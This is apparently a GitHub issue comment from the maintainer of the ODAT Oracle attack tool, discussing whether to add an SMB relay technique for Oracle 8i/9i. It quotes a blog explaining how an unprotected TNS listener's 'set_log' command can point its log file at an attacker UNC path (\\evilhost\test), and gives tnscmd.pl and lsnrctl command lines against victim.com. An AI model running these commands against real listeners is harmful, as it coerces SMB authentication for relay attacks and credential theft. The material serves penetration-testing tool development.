quentinhardy
commented
8 years ago Hello,
Thank you for the link. I have already read a post about this trick. We can use this method only on 8i and 9i. ODAT is not compatible with these versions yet because there are still many work on 10-11-12 versions. This feature will be perhaps added in a future version if all is done on 10-11-12 versions.
I append a new line in the TODO list (c1efccf0339023ff7d1af42ec80fd869a7192e1e).
The method used for SMB authentication is
ctxsys.context, however according to this blog another method exists. Perhaps this is also interesting to be added.https://erpscan.com/press-center/blog/smbrelay-bible-3-smbrelay-by-oracle/
"The Transparent Network Substrate (TNS) listener is a service which establishes and maintains connections with Oracle database services. When it receives a request from a client, the TNS listener establishes a connection between the client and server over a transparent network substrate, which allows communication regardless of the network protocol being used by either system."
We can use this method when we have ability for remote connection to TNS listener.
Before 10g TNS listener is not defended by password or ‘ADMIN_RESTRICTIONS' option by default. We should use ‘set_log' command for SMB relay.
The command ‘set_log' sets a way to TNS listener's log file. We can use either an original Oracle tool – ‘lsnrctl' or a Perl script – ‘tnscmd' to exploit this vulnerability.
Example with Perl script:
./tnscmd.pl -h victim.com --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=\\evilhost\test)))"Example with LSNRCTL:
LSNRCTL>set log_file \evilhost\test
Next connection to TNS-listener gives you necessary UNC-request for SMBrelay.